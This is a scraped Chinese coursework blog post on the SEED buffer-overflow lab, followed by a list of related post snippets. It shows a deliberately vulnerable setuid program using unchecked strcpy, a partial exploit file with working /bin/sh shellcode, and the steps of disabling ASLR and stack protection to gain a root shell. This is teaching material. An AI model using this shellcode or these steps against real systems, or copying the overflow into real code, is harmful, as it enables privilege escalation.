2. 程式人生 > >2017-2018-2 20179215《網絡攻防實踐》seed緩沖區溢出實驗

2017-2018-2 20179215《網絡攻防實踐》seed緩沖區溢出實驗

阿新 發佈:2018-05-12
程序 byte UC inux 最大 切換 guard RR 註意

seed緩沖區溢出實驗

有漏洞的程序:

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

編譯以上易被攻擊的程序並用 setuid 機制設置其有效執行用戶為 root。你可以通過用root 帳戶編譯並 chmod 可執行到 4755 來實現。

註:以上程序有一個緩沖區溢出漏洞。它一開始從一個叫“badfile”的文件讀了一個輸入,然後將這個輸入傳遞給了另一個 bof()功能裏的緩沖區。原始輸入最大長度為 517 bytes,然而 bof()的長度僅為 12 bytes。由於strcpy()不檢查邊界,將發生緩沖區溢出。由於此程序有效執行用戶root。如果一個普通用戶利用了此緩沖區溢出漏洞,他有可能獲得 root shell。應該註意到此程序是從一個叫做“badfile”的文件獲得輸入的,這個文件受用戶控制。現在我們的目標是為“badfile”創建內容,這樣當這段漏洞程序將此內容復制進它的緩沖區,便產生了一個 shell。

任務:攻擊漏洞

我們提供給你一段部分完成的攻擊代碼“exploit.c”,這段代碼的目的是為“badfile”創建內容。代碼中,shellcode 已經給出,你需要完成其余部分。

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[ ]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

完成以上程序後編譯並運行,它將為“badfile”生成內容。然後運行漏洞程序棧,如果你的攻擊正確實現,你將得到一個shell。

實驗過程:
(1)進入seed系統後,使用 sudo su命令提權:

技術分享圖片

(2)Ubuntu 和其它一些 Linux 系統都 適用了地址空間隨機化機制(ASLR)來隨機變化堆棧的起始地址。這將使猜測精確的地址非常 困難,猜測地址是緩沖區溢出攻擊中關鍵的一步。在這個實驗中,我們使用下面的命令關閉 ASLR:

技術分享圖片

(3)另:GCC 編譯器中實現了一種”Stack Guard”的安全機制來防止緩沖區溢出。你可以關 閉該保護當您編譯時使用-fno-stack-protector。例如,編譯一個叫 example.c 的程序並且不使 用 Stack Guard,你應該使用下面的命令: gcc -fno-stack-protector example.c

不使用Stack Guard機制的GCC編譯stack.c程序,並提權:

技術分享圖片

註意上述操作完成後要切換為普通用戶,終端鍵入:exit:

技術分享圖片

(4)編譯exploit,並執行如下操作,發現成功取得了root shell:

技術分享圖片

(5)使用命令id檢測下,攻擊成功:

技術分享圖片

2017-2018-2 20179215《網絡攻防實踐》seed緩沖區溢出實驗

相關推薦

2017-2018-2 20179215攻防實踐seed實驗

程序 byte UC inux 最大 切換 guard RR 註意 seed緩沖區溢出實驗 有漏洞的程序: /* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task i

2017-2018-2攻防實踐》第三周作業

OS nessus wps 掃描方式 for 探測 window keyword bash 第三周作業: 第一節:第三章學習: 1.1網絡信息收集 網絡信息收集的目的是盡可能了解目標,這包括目標的漏洞IP地址範圍,外部網絡闊樸結構等。 1.2網絡信息收集方法

2018-2019-2 20165232《對抗技術》Exp1 實驗

十六 切換 ont spa 技術 shell函數 字節 roo 字符串 2018-2019-2 20165232《網絡對抗技術》Exp1 緩沖區溢出實驗 實驗點1:逆向及Bof基礎實踐 實踐任務 用一個pwn1文件。 該程序正常執行流程是:main調用foo函數,foo函數

2017-2018-2 20179205《攻防技術與實踐》第十周作業 攻防研究

崩潰 exe 第十周 此外 root權限 計算 進制 close bind 《網絡攻防技術與實踐》第十周作業 緩沖區溢出攻防研究 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意

2017-2018-2對抗技術》 20155322 Exp4 惡意代碼分析

msfvenom 密鑰對 想要 ipv 執行 接收 .net 數據 ref [-= 博客目錄 =-] 1-實踐目標 1.1-實踐介紹 1.2-實踐內容 1.3-實踐要求 2-實踐過程 2.1-Mac下網絡監控 2.2-Windows下網絡監控 2.3-Mac下惡意

2017-2018-2對抗技術》 20155322 Exp 5 MSF基礎應用

load tab 其他 obj lis 測試 可能 cte 信息 [-= 博客目錄 =-] 1-實踐目標 1.1-實踐介紹 1.2-實踐內容 1.3-實踐要求 2-實踐過程 2.1-情報收集 2.2-主動攻擊實踐-ms08_067 2.3-瀏覽器攻擊實踐-many

2017-2018》《攻防技術》第九周作業

超鏈接 kit ctr 外部命令 下一步 檢查 加密 magictree 系統 教材學習總結 本周主要學習了《網絡攻防---技術與實踐》第9、10章的內容,主要學習了 惡意代碼攻防 與軟件安全攻防 惡意代碼安全攻防 1.基礎知識 惡意代碼是指使計算機按照攻擊者的意圖執行以達

2018-2019-1 20165334《信息安全系統設計基礎》第三周學習總結及漏洞實驗

過程 信息安全 截圖 分享圖片 進入 種類 系統 xxx img 2018-2019-1 20165334《信息安全系統設計基礎》第三周學習總結及緩沖區溢出漏洞實驗 一、指令學習 gcc -Og -o xxx.c學習 -Og會告訴編譯器使用會生成符合原始c語言代碼的整體結構

2017-2018-2 20179215攻防實踐》第十周作業

運行 溢出 apt 空間 崩潰 code gcc編譯器 技術 IT 2017-2018-2 20179215 《網絡攻防實踐》 第十周作業 緩沖區溢出漏洞實踐 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,

2017-2018-2 20179215攻防實踐》第十三周作業

編寫 sm3 線上 相對 TE 安全 sha 驗證 公鑰 2017-2018-2 20179215 《網絡攻防技術》 第十三周作業 國密算法實現 一、國產密碼算法介紹 國產密碼算法(國密算法)是指國家密碼局認定的國產商用密碼算法,在金融領域目前主要使用公開的SM2、SM3、

2017-2018-2 20179213《攻防實踐》第七周作業

日誌 gin 路徑 桌面 過時 加密 對象 eal netcat 教材總結 Windows操作系統基本框架 windows基本結構分為運行於處理器特權模式的操作系統內核以及運行在處理器非特權模式的用戶,即為內核態和用戶態。 內核態:windows執行體、windows內

2017-2018-2 20179213《攻防實踐》第九周學習

框架 md5 重復 掃描 不可 Go AD 對比 autops 教材學習 第九章 惡意代碼安全攻防 惡意代碼定義 ?? 惡意代碼是指使計算機按照攻擊者的意圖執行以達到惡意目標的指令集。 類型包括:計算機病毒、蠕蟲、惡意移動代碼、後門、特洛伊木馬、僵屍程序、內核套件、融合型惡

2017-2018-1 20179205《攻防實踐》第一周作業

問題 觀點 png pwd 我們 註意 小問題 passwd 9.png a.你對師生關系的理解,希望是哪種關系? 良好的師生關系表現為: 民主平等(人格平等,朋友式的友好幫助關系,教師對學生一視同仁) 尊師愛生(學生尊敬教師,尊重教師的勞動和人格尊嚴,虛心接受教師的指導

虛擬化攻防實踐報告

com 169.254 9.1 通過 查詢 進行 過程 ima spa 虛擬化網絡攻防實踐實驗 1.虛擬化網絡攻防實踐實驗組成: l 靶機:包含應用系統和應用程序安全漏洞,髕骨走位攻擊目標的主機。 l 攻擊機:安裝一些專用的攻擊軟件,用於發起網絡攻擊的主機。 l 攻

第四周攻防實踐作業

令行 解決 混雜模式 linu 技術分享 信息 句柄 內置 web 第四周 《網絡攻防實踐作業》 第一節。網絡攻防技術與實踐 1. 網絡嗅探 l 定義:網絡嗅探是利用計算機的網絡端口解惑目的地為其他的計算機的數據報文,以監聽數據流中所包含的信息。 l 攻擊方式:攻擊

20179311《攻防實踐》第七周作業

編碼工具 vsftpd 鍵值 oracl idl initial beef 手工 獲得 1.Windows操作系統的基本結構分為運行於處理器特權模式的操作系統內核,以及運行在處理器非特權模式的用戶空間代碼。采用宏內核模式來進行構架,這使得任意的內核模塊或設備驅動程序都可能破

攻防實踐》第七周作業

windows內核 die near document con pre console hidden 開發框架 MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,

20179301《攻防實踐》第七周作業

server ice 根據 創建 編碼器 文件管理 不同 瀏覽器 tdi a、教材《網絡攻防技術》第七章的學習 第七章Windouws操作系統安全攻防的內容進行學習。Windouws是目前市場上占統治地位的操作系統,到2010年,已經占據了百分之八十八的市場份額。基本

2017-2018-2 20179215《密碼與安全新技術》 第三次作業

code 視頻監控 存在 模態 進入 有效 保護 總結 跨平臺 2017-2018-2 20179215 《密碼與安全新技術》 第三次作業 課程:《密碼與安全新技術》 班級: 201792 姓名: 袁琳 學號:20179215 上課教師:謝四江 上課日期:2018年3月29

攻防實踐 第十周作業

buffer void bad add 100% mbed ogr figure 設置 網絡攻防實踐作業 html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,